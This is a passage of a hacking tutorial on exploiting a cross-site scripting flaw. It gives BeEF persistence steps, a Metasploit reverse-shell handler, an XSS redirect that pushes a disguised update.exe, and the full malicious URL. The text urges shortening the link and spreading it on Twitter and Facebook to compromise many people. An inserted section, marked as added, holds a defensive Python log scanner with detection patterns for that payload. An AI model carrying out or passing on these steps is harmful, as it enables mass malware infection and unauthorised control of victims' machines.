Now that we have control over a victim's browser, we need to use some attacks to maintain the connection, or even better: upload a shell.
Now that the victim's browser is hooked, we need to quickly set up a persistence method to keep the connection alive. To do this, click on the IP address under the Online folder, and go to the Commands tab.
Open Persistence and click on whatever method you like. For this tutorial, I'm going to use the Confirm Close Tab method. To do this, press the Execute button in the bottom right corner. Now if the user tries to close the tab, it will repeatedly ask the user if they want to close the browser (unless it's Chrome or Opera < 12).
Now that we have a persistent connection, we can do all sorts of things with the browser. We can play sounds, check information, and even try to exploit the machine. What we're going to do now is create a Meterpreter shell with Metasploit. We don't actually need BeEF to do this, though.
Go ahead and make a payload that you want to execute. I'll just use a basic Meterpreter payload for this example. Rename this to something innocent or related like HTML5 Updated Graphics.
Open Metasploit and type use /multi/handler and set payload windows/meterpreter/reverse_tcp (or whatever payload you used). Type exploit -j -z. Upload the payload to your web server.
Now we need to create a link that will ask the victim to download our malicious file. The script for doing this is <script>document.location="http://10.0.2.13/update.exe ";</script>
The URL for this search query is http://www.insecurelabs.org/Task/Rule1?query=<script>document.location="http://10.0.2.13/update.exe ";</script>
I would recommend shortening this with Bit.ly.
Send this link out to many people on Twitter or Facebook and keep listening for connections. You should get many connections very quickly. Just remember that the payload you made should be named something related to the vulnerable website.
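Seen from the vulnerable site's side, every click on that link arrives as a request to /Task/Rule1 with the script in the query parameter, and it shows up in the access log even when the link was shortened. The following is an added example, not part of the original tutorial: a small log scanner that flags this request shape. The log lines are constructed, and the common log format, rule names and function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (common log format, documentation IPs); not real traffic.
# Entry 2 is this page's URL percent-encoded, entry 3 a double-encoded variant.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /Task/Rule1?query=shoes HTTP/1.1" 200 512',
    '203.0.113.8 - - [01/Jan/2024:10:00:05 +0000] "GET /Task/Rule1?query=%3Cscript%3E'
    'document.location%3D%22http%3A%2F%2F10.0.2.13%2Fupdate.exe%20%22%3B%3C%2Fscript%3E HTTP/1.1" 200 734',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /Task/Rule1?query=%253Cscript%253E'
    'alert(1)%253C%252Fscript%253E HTTP/1.1" 200 601',
    '203.0.113.10 - - [01/Jan/2024:10:00:12 +0000] "GET /Task/Rule1?query=document+location+tips HTTP/1.1" 200 498',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Hypothetical rule names; the patterns cover the payload shape shown in this tutorial.
RULES = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "js_redirect": re.compile(r"(?:document|window)\.location|location\.href", re.I),
    "exe_url": re.compile(r"https?://[^\s\"'<>]+\.(?:exe|msi|scr|bat)\b", re.I),
}

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (client_ip, sorted rule names that fired) for one log line."""
    match = REQUEST.search(line)
    if not match:
        return None, []
    client, target = match.groups()
    hits = set()
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        text = fully_decode(value)
        hits.update(name for name, rx in RULES.items() if rx.search(text))
    return client, sorted(hits)

def flagged(lines):
    """Keep only the requests where at least one rule fired."""
    return [(ip, hits) for ip, hits in map(scan_line, lines) if hits]

if __name__ == "__main__":
    for ip, hits in flagged(SAMPLE_LOG):
        print(ip, hits)
```

A request that fires all three rules at once (script tag, JavaScript redirect, off-site executable URL) matches the delivery link described here and is worth alerting on rather than only logging.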
Now we've got a Meterpreter session!
Now you can migrate and do whatever on their system! The best part is, the payload was downloaded from the official website, so they won't think it's malware.
As you can see, the XSS vulnerability is a fun and easy vulnerability to exploit. I hope you learned much from this series, and if you want some more, I could add some "bonus" attacks to do. ;)
C|H of C3